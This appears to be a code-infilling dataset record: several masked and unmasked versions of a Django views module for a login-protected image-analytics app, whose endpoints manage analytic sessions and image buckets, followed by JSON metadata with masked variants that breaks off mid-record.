return HttpResponse(template.render(context, request))
@require_POST
def log_in(request):
"""
Handles login.
"""
username = request.POST.get('username')
password = request.POST.get('password')
if not username or not password:
return index(request, 'Invalid credentials!')
user = authenticate(username=username, password=password)
if user:
login(request, user)
return redirect('/main')
else:
return index(request, 'Invalid credentials!')
def main(request):
"""
Renders the main page behind login.
"""
if not request.user.is_authenticated:
return redirect('/')
template = loader.get_template('aimodel/main.html')
context = dict()
context['datasets'] = DatasetConfigManager.loaded_datasets_list()
return HttpResponse(template.render(context, request))
@require_POST
def analytics_session(request):
"""
Starts a new analytic session.
"""
if not request.user.is_authenticated:
return redirect('/')
try:
dataset = request.POST['dataset']
except KeyError:
err = 'Invalid request params!'
return HttpResponseBadRequest(reason=err)
if 'analytics' in request.session:
del request.session['analytics']
request.session['analytics'] = AnalyticSession(dataset)
bucket_info = request.session['analytics'].bucket_info()
template = loader.get_template('ui/analytics.html')
context = dict()
context['init_buckets'] = json.dumps(bucket_info['buckets'])
context['init_bucket_ordering'] = json.dumps(bucket_info['bucket_ordering']
)
return HttpResponse(template.render(context, request))
def log_out(request):
"""
Logs the user out.
"""
if request.user.is_authenticated:
logout(request)
return redirect('/')
def _check_session_valid(request):
"""
A helper function checking whether the user is logged in and the session
data is present.
"""
if not request.user.is_authenticated:
return HttpResponseForbidden(reason='Access denied!')
if 'analytics' not in request.session:
err = 'Could not fetch analytic session data.'
return HttpResponseBadRequest(reason=err)
return None
def bucket_info(request):
"""
Fetches information about current buckets.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
return JsonResponse(request.session['analytics'].bucket_info())
<|reserved_special_token_0|>
@require_POST
def rename_bucket(request):
"""
Renames a bucket.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
bucket_id = request_data['bucket_id']
new_bucket_name = request_data['new_bucket_name']
except KeyError:
err = 'Invalid request params!'
return HttpResponseBadRequest(reason=err)
try:
request.session['analytics'].rename_bucket(bucket_id, new_bucket_name)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse({})
@require_POST
def swap_buckets(request):
"""
Swaps the position of two buckets.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
bucket1_id = request_data['bucket1_id']
bucket2_id = request_data['bucket2_id']
except KeyError:
err = 'Invalid request params!'
return HttpResponseBadRequest(reason=err)
try:
request.session['analytics'].swap_buckets(bucket1_id, bucket2_id)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse({})
@require_POST
def toggle_bucket(request):
"""
Toggles (activates/deactivates) a bucket.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
bucket_id = request_data['bucket_id']
except KeyError:
err = 'Invalid request params!'
return HttpResponseBadRequest(reason=err)
try:
request.session['analytics'].toggle_bucket(bucket_id)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse({})
@require_POST
def interaction_round(request):
"""
Performs an interaction round, providing new image suggestions.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
user_feedback = json.loads(request.body)
try:
suggs = request.session['analytics'].interaction_round(user_feedback)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse(suggs, safe=False)
@require_POST
def bucket_view_data(request):
"""
Obtains bucket view data, i.e., the images in the bucket with bucket
confidences.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
bucket_id = request_data['bucket_id']
sort_by = request_data['sort_by']
except KeyError:
err = 'Invalid request params!'
return HttpResponseBadRequest(reason=err)
try:
bucket_view_data = request.session['analytics'].bucket_view_data(
bucket_id, sort_by)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse(bucket_view_data, safe=False)
def toggle_mode(request):
"""
Toggles between Tetris/grid.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request.session['analytics'].toggle_mode()
return JsonResponse({})
@require_POST
def grid_set_size(request):
"""
Resizes the grid.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
dim = request_data['dim']
new_size = request_data['new_size']
except KeyError:
err = 'Invalid request params!'
return HttpResponseBadRequest(reason=err)
try:
new_grid_data = request.session['analytics'].grid_set_size(dim,
new_size)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse(new_grid_data, safe=False)
@require_POST
def transfer_images(request):
"""
Transfers (moves/copies) images between buckets.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
images = request_data['images']
bucket_src = request_data['bucket_src']
bucket_dst = request_data['bucket_dst']
mode = request_data['mode']
sort_by = request_data['sort_by']
except KeyError:
err = 'Invalid request params!'
return HttpResponseBadRequest(reason=err)
try:
request.session['analytics'].transfer_images(images, bucket_src,
bucket_dst, mode)
bucket_view_data = request.session['analytics'].bucket_view_data(
bucket_src, sort_by)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse(bucket_view_data, safe=False)
<|reserved_special_token_0|>
@require_POST
def ff_commit(request):
"""
Commits a fast-forward.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
print(request_data)
try:
bucket = request_data['bucket']
except KeyError:
err = 'Invalid request params!'
return HttpResponseBadRequest(reason=err)
try:
request.session['analytics'].ff_commit(bucket)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse({})
def end_session(request):
"""
Ends an analytic session.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
del request.session['analytics']
response = {'redirect_url': '/main'}
return JsonResponse(response)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def index(request, err_msg=None):
"""
Renders the index page.
"""
template = loader.get_template('aimodel/index.html')
context = {}
context['err_msg'] = err_msg
return HttpResponse(template.render(context, request))
@require_POST
def log_in(request):
"""
Handles login.
"""
username = request.POST.get('username')
password = request.POST.get('password')
if not username or not password:
return index(request, 'Invalid credentials!')
user = authenticate(username=username, password=password)
if user:
login(request, user)
return redirect('/main')
else:
return index(request, 'Invalid credentials!')
def main(request):
"""
Renders the main page behind login.
"""
if not request.user.is_authenticated:
return redirect('/')
template = loader.get_template('aimodel/main.html')
context = dict()
context['datasets'] = DatasetConfigManager.loaded_datasets_list()
return HttpResponse(template.render(context, request))
@require_POST
def analytics_session(request):
"""
Starts a new analytic session.
"""
if not request.user.is_authenticated:
return redirect('/')
try:
dataset = request.POST['dataset']
except KeyError:
err = 'Invalid request params!'
return HttpResponseBadRequest(reason=err)
if 'analytics' in request.session:
del request.session['analytics']
request.session['analytics'] = AnalyticSession(dataset)
bucket_info = request.session['analytics'].bucket_info()
template = loader.get_template('ui/analytics.html')
context = dict()
context['init_buckets'] = json.dumps(bucket_info['buckets'])
context['init_bucket_ordering'] = json.dumps(bucket_info['bucket_ordering']
)
return HttpResponse(template.render(context, request))
def log_out(request):
"""
Logs the user out.
"""
if request.user.is_authenticated:
logout(request)
return redirect('/')
def _check_session_valid(request):
"""
A helper function checking whether the user is logged in and the session
data is present.
"""
if not request.user.is_authenticated:
return HttpResponseForbidden(reason='Access denied!')
if 'analytics' not in request.session:
err = 'Could not fetch analytic session data.'
return HttpResponseBadRequest(reason=err)
return None
def bucket_info(request):
"""
Fetches information about current buckets.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
return JsonResponse(request.session['analytics'].bucket_info())
def create_bucket(request):
"""
Creates a bucket.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
try:
request.session['analytics'].create_bucket()
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse({})
<|reserved_special_token_0|>
@require_POST
def rename_bucket(request):
"""
Renames a bucket.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
bucket_id = request_data['bucket_id']
new_bucket_name = request_data['new_bucket_name']
except KeyError:
err = 'Invalid request params!'
return HttpResponseBadRequest(reason=err)
try:
request.session['analytics'].rename_bucket(bucket_id, new_bucket_name)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse({})
@require_POST
def swap_buckets(request):
"""
Swaps the position of two buckets.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
bucket1_id = request_data['bucket1_id']
bucket2_id = request_data['bucket2_id']
except KeyError:
err = 'Invalid request params!'
return HttpResponseBadRequest(reason=err)
try:
request.session['analytics'].swap_buckets(bucket1_id, bucket2_id)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse({})
@require_POST
def toggle_bucket(request):
"""
Toggles (activates/deactivates) a bucket.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
bucket_id = request_data['bucket_id']
except KeyError:
err = 'Invalid request params!'
return HttpResponseBadRequest(reason=err)
try:
request.session['analytics'].toggle_bucket(bucket_id)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse({})
@require_POST
def interaction_round(request):
"""
Performs an interaction round, providing new image suggestions.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
user_feedback = json.loads(request.body)
try:
suggs = request.session['analytics'].interaction_round(user_feedback)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse(suggs, safe=False)
@require_POST
def bucket_view_data(request):
"""
Obtains bucket view data, i.e., the images in the bucket with bucket
confidences.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
bucket_id = request_data['bucket_id']
sort_by = request_data['sort_by']
except KeyError:
err = 'Invalid request params!'
return HttpResponseBadRequest(reason=err)
try:
bucket_view_data = request.session['analytics'].bucket_view_data(
bucket_id, sort_by)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse(bucket_view_data, safe=False)
def toggle_mode(request):
"""
Toggles between Tetris/grid.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request.session['analytics'].toggle_mode()
return JsonResponse({})
@require_POST
def grid_set_size(request):
"""
Resizes the grid.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
dim = request_data['dim']
new_size = request_data['new_size']
except KeyError:
err = 'Invalid request params!'
return HttpResponseBadRequest(reason=err)
try:
new_grid_data = request.session['analytics'].grid_set_size(dim,
new_size)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse(new_grid_data, safe=False)
@require_POST
def transfer_images(request):
"""
Transfers (moves/copies) images between buckets.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
images = request_data['images']
bucket_src = request_data['bucket_src']
bucket_dst = request_data['bucket_dst']
mode = request_data['mode']
sort_by = request_data['sort_by']
except KeyError:
err = 'Invalid request params!'
return HttpResponseBadRequest(reason=err)
try:
request.session['analytics'].transfer_images(images, bucket_src,
bucket_dst, mode)
bucket_view_data = request.session['analytics'].bucket_view_data(
bucket_src, sort_by)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse(bucket_view_data, safe=False)
@require_POST
def fast_forward(request):
"""
Fast-forwards a bucket.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
bucket = request_data['bucket']
n_ff = request_data['n_ff']
except KeyError:
err = 'Invalid request params!'
return HttpResponseBadRequest(reason=err)
try:
request.session['analytics'].fast_forward(bucket, n_ff)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse({})
@require_POST
def ff_commit(request):
"""
Commits a fast-forward.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
print(request_data)
try:
bucket = request_data['bucket']
except KeyError:
err = 'Invalid request params!'
return HttpResponseBadRequest(reason=err)
try:
request.session['analytics'].ff_commit(bucket)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse({})
def end_session(request):
"""
Ends an analytic session.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
del request.session['analytics']
response = {'redirect_url': '/main'}
return JsonResponse(response)
<|reserved_special_token_1|>
from django.contrib.auth import authenticate, login, logout
from django.template import loader
from django.http import (HttpResponse, JsonResponse,
HttpResponseForbidden, HttpResponseBadRequest)
from django.shortcuts import redirect
from django.views.decorators.http import require_POST
import json
from aimodel.AnalyticSession import AnalyticSession
from data.DatasetConfigManager import DatasetConfigManager
def index(request, err_msg=None):
"""
Renders the index page.
"""
template = loader.get_template("aimodel/index.html")
context = {}
context["err_msg"] = err_msg
return HttpResponse(template.render(context, request))
@require_POST
def log_in(request):
"""
Handles login.
"""
# Get the username and password
username = request.POST.get("username")
password = request.POST.get("password")
if not username or not password:
return index(request, "Invalid credentials!")
# Authenticate and log in
user = authenticate(username=username, password=password)
if user:
login(request, user)
return redirect("/main")
else:
return index(request, "Invalid credentials!")
def main(request):
"""
Renders the main page behind login.
"""
if not request.user.is_authenticated:
return redirect("/")
template = loader.get_template("aimodel/main.html")
context = dict()
context["datasets"] = DatasetConfigManager.loaded_datasets_list()
return HttpResponse(template.render(context, request))
@require_POST
def analytics_session(request):
"""
Starts a new analytic session.
"""
if not request.user.is_authenticated:
return redirect("/")
try:
dataset = request.POST["dataset"]
except KeyError:
err = "Invalid request params!"
return HttpResponseBadRequest(reason=err)
if "analytics" in request.session:
del request.session["analytics"]
request.session["analytics"] = AnalyticSession(dataset)
bucket_info = request.session["analytics"].bucket_info()
template = loader.get_template("ui/analytics.html")
context = dict()
context["init_buckets"] = json.dumps(bucket_info["buckets"])
context["init_bucket_ordering"] =\
json.dumps(bucket_info["bucket_ordering"])
return HttpResponse(template.render(context, request))
def log_out(request):
"""
Logs the user out.
"""
if request.user.is_authenticated:
logout(request)
return redirect("/")
def _check_session_valid(request):
"""
A helper function checking whether the user is logged in and the session
data is present.
"""
if not request.user.is_authenticated:
return HttpResponseForbidden(reason="Access denied!")
if "analytics" not in request.session:
err = "Could not fetch analytic session data."
return HttpResponseBadRequest(reason=err)
return None
def bucket_info(request):
"""
Fetches information about current buckets.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
return JsonResponse(request.session["analytics"].bucket_info())
def create_bucket(request):
"""
Creates a bucket.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
try:
request.session["analytics"].create_bucket()
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse({})
@require_POST
def delete_bucket(request):
"""
Deletes a bucket.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
bucket_id = request_data["bucket_id"]
except KeyError:
err = "Invalid request params!"
return HttpResponseBadRequest(reason=err)
try:
request.session["analytics"].delete_bucket(bucket_id)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse({})
@require_POST
def rename_bucket(request):
"""
Renames a bucket.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
bucket_id = request_data["bucket_id"]
new_bucket_name = request_data["new_bucket_name"]
except KeyError:
err = "Invalid request params!"
return HttpResponseBadRequest(reason=err)
try:
request.session["analytics"].rename_bucket(bucket_id, new_bucket_name)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse({})
@require_POST
def swap_buckets(request):
"""
Swaps the position of two buckets.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
bucket1_id = request_data["bucket1_id"]
bucket2_id = request_data["bucket2_id"]
except KeyError:
err = "Invalid request params!"
return HttpResponseBadRequest(reason=err)
try:
request.session["analytics"].swap_buckets(bucket1_id, bucket2_id)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse({})
@require_POST
def toggle_bucket(request):
"""
Toggles (activates/deactivates) a bucket.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
bucket_id = request_data["bucket_id"]
except KeyError:
err = "Invalid request params!"
return HttpResponseBadRequest(reason=err)
try:
request.session["analytics"].toggle_bucket(bucket_id)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse({})
@require_POST
def interaction_round(request):
"""
Performs an interaction round, providing new image suggestions.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
user_feedback = json.loads(request.body)
try:
suggs = request.session["analytics"].interaction_round(user_feedback)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse(suggs, safe=False)
@require_POST
def bucket_view_data(request):
"""
Obtains bucket view data, i.e., the images in the bucket with bucket
confidences.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
bucket_id = request_data["bucket_id"]
sort_by = request_data["sort_by"]
except KeyError:
err = "Invalid request params!"
return HttpResponseBadRequest(reason=err)
try:
bucket_view_data =\
request.session["analytics"].bucket_view_data(bucket_id, sort_by)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse(bucket_view_data, safe=False)
def toggle_mode(request):
"""
Toggles between Tetris/grid.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request.session["analytics"].toggle_mode()
return JsonResponse({})
@require_POST
def grid_set_size(request):
"""
Resizes the grid.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
dim = request_data["dim"]
new_size = request_data["new_size"]
except KeyError:
err = "Invalid request params!"
return HttpResponseBadRequest(reason=err)
try:
new_grid_data = request.session["analytics"].grid_set_size(dim,
new_size)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse(new_grid_data, safe=False)
@require_POST
def transfer_images(request):
"""
Transfers (moves/copies) images between buckets.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
images = request_data["images"]
bucket_src = request_data["bucket_src"]
bucket_dst = request_data["bucket_dst"]
mode = request_data["mode"]
sort_by = request_data["sort_by"]
except KeyError:
err = "Invalid request params!"
return HttpResponseBadRequest(reason=err)
try:
request.session["analytics"].transfer_images(images,
bucket_src, bucket_dst,
mode)
bucket_view_data =\
request.session["analytics"].bucket_view_data(bucket_src, sort_by)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse(bucket_view_data, safe=False)
@require_POST
def fast_forward(request):
"""
Fast-forwards a bucket.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
try:
bucket = request_data["bucket"]
n_ff = request_data["n_ff"]
except KeyError:
err = "Invalid request params!"
return HttpResponseBadRequest(reason=err)
try:
request.session["analytics"].fast_forward(bucket, n_ff)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse({})
@require_POST
def ff_commit(request):
"""
Commits a fast-forward.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
request_data = json.loads(request.body)
print(request_data)
try:
bucket = request_data["bucket"]
except KeyError:
err = "Invalid request params!"
return HttpResponseBadRequest(reason=err)
try:
request.session["analytics"].ff_commit(bucket)
except ValueError as e:
return HttpResponseBadRequest(reason=str(e))
return JsonResponse({})
def end_session(request):
"""
Ends an analytic session.
"""
session_check = _check_session_valid(request)
if session_check:
return session_check
del request.session["analytics"]
response = {
"redirect_url": "/main"
}
return JsonResponse(response)
|
flexible
|
{
"blob_id": "41ca762fe6865613ae4ef2f657f86b516353676f",
"index": 9784,
"step-1": "<mask token>\n\n\ndef index(request, err_msg=None):\n \"\"\"\n Renders the index page.\n \"\"\"\n template = loader.get_template('aimodel/index.html')\n context = {}\n context['err_msg'] = err_msg\n return HttpResponse(template.render(context, request))\n\n\n<mask token>\n\n\n@require_POST\ndef analytics_session(request):\n \"\"\"\n Starts a new analytic session.\n \"\"\"\n if not request.user.is_authenticated:\n return redirect('/')\n try:\n dataset = request.POST['dataset']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n if 'analytics' in request.session:\n del request.session['analytics']\n request.session['analytics'] = AnalyticSession(dataset)\n bucket_info = request.session['analytics'].bucket_info()\n template = loader.get_template('ui/analytics.html')\n context = dict()\n context['init_buckets'] = json.dumps(bucket_info['buckets'])\n context['init_bucket_ordering'] = json.dumps(bucket_info['bucket_ordering']\n )\n return HttpResponse(template.render(context, request))\n\n\ndef log_out(request):\n \"\"\"\n Logs the user out.\n \"\"\"\n if request.user.is_authenticated:\n logout(request)\n return redirect('/')\n\n\ndef _check_session_valid(request):\n \"\"\"\n A helper function checking whether the user is logged in and the session\n data is present.\n \"\"\"\n if not request.user.is_authenticated:\n return HttpResponseForbidden(reason='Access denied!')\n if 'analytics' not in request.session:\n err = 'Could not fetch analytic session data.'\n return HttpResponseBadRequest(reason=err)\n return None\n\n\ndef bucket_info(request):\n \"\"\"\n Fetches information about current buckets.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n return JsonResponse(request.session['analytics'].bucket_info())\n\n\n<mask token>\n\n\n@require_POST\ndef rename_bucket(request):\n \"\"\"\n Renames a bucket.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request_data = json.loads(request.body)\n try:\n bucket_id = request_data['bucket_id']\n new_bucket_name = request_data['new_bucket_name']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n request.session['analytics'].rename_bucket(bucket_id, new_bucket_name)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse({})\n\n\n@require_POST\ndef swap_buckets(request):\n \"\"\"\n Swaps the position of two buckets.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request_data = json.loads(request.body)\n try:\n bucket1_id = request_data['bucket1_id']\n bucket2_id = request_data['bucket2_id']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n request.session['analytics'].swap_buckets(bucket1_id, bucket2_id)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse({})\n\n\n@require_POST\ndef toggle_bucket(request):\n \"\"\"\n Toggles (activates/deactivates) a bucket.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request_data = json.loads(request.body)\n try:\n bucket_id = request_data['bucket_id']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n request.session['analytics'].toggle_bucket(bucket_id)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse({})\n\n\n<mask token>\n\n\ndef toggle_mode(request):\n \"\"\"\n Toggles between Tetris/grid.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request.session['analytics'].toggle_mode()\n return JsonResponse({})\n\n\n@require_POST\ndef grid_set_size(request):\n \"\"\"\n Resizes the grid.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request_data = json.loads(request.body)\n try:\n dim = request_data['dim']\n new_size = request_data['new_size']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n new_grid_data = request.session['analytics'].grid_set_size(dim,\n new_size)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse(new_grid_data, safe=False)\n\n\n@require_POST\ndef transfer_images(request):\n \"\"\"\n Transfers (moves/copies) images between buckets.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request_data = json.loads(request.body)\n try:\n images = request_data['images']\n bucket_src = request_data['bucket_src']\n bucket_dst = request_data['bucket_dst']\n mode = request_data['mode']\n sort_by = request_data['sort_by']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n request.session['analytics'].transfer_images(images, bucket_src,\n bucket_dst, mode)\n bucket_view_data = request.session['analytics'].bucket_view_data(\n bucket_src, sort_by)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse(bucket_view_data, safe=False)\n\n\n<mask token>\n\n\n@require_POST\ndef ff_commit(request):\n \"\"\"\n Commits a fast-forward.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request_data = json.loads(request.body)\n print(request_data)\n try:\n bucket = request_data['bucket']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n request.session['analytics'].ff_commit(bucket)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse({})\n\n\ndef end_session(request):\n \"\"\"\n Ends an analytic session.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n del request.session['analytics']\n response = {'redirect_url': '/main'}\n return JsonResponse(response)\n",
"step-2": "<mask token>\n\n\ndef index(request, err_msg=None):\n \"\"\"\n Renders the index page.\n \"\"\"\n template = loader.get_template('aimodel/index.html')\n context = {}\n context['err_msg'] = err_msg\n return HttpResponse(template.render(context, request))\n\n\n<mask token>\n\n\ndef main(request):\n \"\"\"\n Renders the main page behind login.\n \"\"\"\n if not request.user.is_authenticated:\n return redirect('/')\n template = loader.get_template('aimodel/main.html')\n context = dict()\n context['datasets'] = DatasetConfigManager.loaded_datasets_list()\n return HttpResponse(template.render(context, request))\n\n\n@require_POST\ndef analytics_session(request):\n \"\"\"\n Starts a new analytic session.\n \"\"\"\n if not request.user.is_authenticated:\n return redirect('/')\n try:\n dataset = request.POST['dataset']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n if 'analytics' in request.session:\n del request.session['analytics']\n request.session['analytics'] = AnalyticSession(dataset)\n bucket_info = request.session['analytics'].bucket_info()\n template = loader.get_template('ui/analytics.html')\n context = dict()\n context['init_buckets'] = json.dumps(bucket_info['buckets'])\n context['init_bucket_ordering'] = json.dumps(bucket_info['bucket_ordering']\n )\n return HttpResponse(template.render(context, request))\n\n\ndef log_out(request):\n \"\"\"\n Logs the user out.\n \"\"\"\n if request.user.is_authenticated:\n logout(request)\n return redirect('/')\n\n\ndef _check_session_valid(request):\n \"\"\"\n A helper function checking whether the user is logged in and the session\n data is present.\n \"\"\"\n if not request.user.is_authenticated:\n return HttpResponseForbidden(reason='Access denied!')\n if 'analytics' not in request.session:\n err = 'Could not fetch analytic session data.'\n return HttpResponseBadRequest(reason=err)\n return None\n\n\ndef bucket_info(request):\n \"\"\"\n Fetches information about current buckets.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n return JsonResponse(request.session['analytics'].bucket_info())\n\n\n<mask token>\n\n\n@require_POST\ndef rename_bucket(request):\n \"\"\"\n Renames a bucket.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request_data = json.loads(request.body)\n try:\n bucket_id = request_data['bucket_id']\n new_bucket_name = request_data['new_bucket_name']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n request.session['analytics'].rename_bucket(bucket_id, new_bucket_name)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse({})\n\n\n@require_POST\ndef swap_buckets(request):\n \"\"\"\n Swaps the position of two buckets.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request_data = json.loads(request.body)\n try:\n bucket1_id = request_data['bucket1_id']\n bucket2_id = request_data['bucket2_id']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n request.session['analytics'].swap_buckets(bucket1_id, bucket2_id)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse({})\n\n\n@require_POST\ndef toggle_bucket(request):\n \"\"\"\n Toggles (activates/deactivates) a bucket.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request_data = json.loads(request.body)\n try:\n bucket_id = request_data['bucket_id']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n request.session['analytics'].toggle_bucket(bucket_id)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse({})\n\n\n@require_POST\ndef interaction_round(request):\n \"\"\"\n Performs an interaction round, providing new image suggestions.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n user_feedback = json.loads(request.body)\n try:\n suggs = request.session['analytics'].interaction_round(user_feedback)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse(suggs, safe=False)\n\n\n@require_POST\ndef bucket_view_data(request):\n \"\"\"\n Obtains bucket view data, i.e., the images in the bucket with bucket\n confidences.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request_data = json.loads(request.body)\n try:\n bucket_id = request_data['bucket_id']\n sort_by = request_data['sort_by']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n bucket_view_data = request.session['analytics'].bucket_view_data(\n bucket_id, sort_by)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse(bucket_view_data, safe=False)\n\n\ndef toggle_mode(request):\n \"\"\"\n Toggles between Tetris/grid.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request.session['analytics'].toggle_mode()\n return JsonResponse({})\n\n\n@require_POST\ndef grid_set_size(request):\n \"\"\"\n Resizes the grid.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request_data = json.loads(request.body)\n try:\n dim = request_data['dim']\n new_size = request_data['new_size']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n new_grid_data = request.session['analytics'].grid_set_size(dim,\n new_size)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse(new_grid_data, safe=False)\n\n\n@require_POST\ndef transfer_images(request):\n \"\"\"\n Transfers (moves/copies) images between buckets.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request_data = json.loads(request.body)\n try:\n images = request_data['images']\n 